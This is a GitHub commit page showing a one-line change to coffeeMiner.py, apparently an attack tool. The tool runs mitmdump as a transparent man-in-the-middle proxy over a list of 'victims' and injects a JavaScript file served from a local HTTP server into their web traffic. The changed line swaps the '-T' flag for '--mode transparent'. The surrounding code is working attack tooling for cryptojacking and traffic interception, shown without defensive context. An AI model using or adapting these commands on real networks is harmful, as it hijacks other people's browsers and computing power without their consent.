Pedro Reis
6 years ago
committed by
GitHub
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with
1 additions and
1 deletions
-
coffeeMiner.py
|
|
@ -25,7 +25,7 @@ for victim in victims: |
|
|
|
os.system("xterm -hold -e 'python3 httpServer.py' &") |
|
|
|
|
|
|
|
# start the mitmproxy |
|
|
|
os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' -T") |
|
|
|
os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' --mode transparent") |
|
|
|
|
|
|
|
|
|
|
|
''' |
|
|
|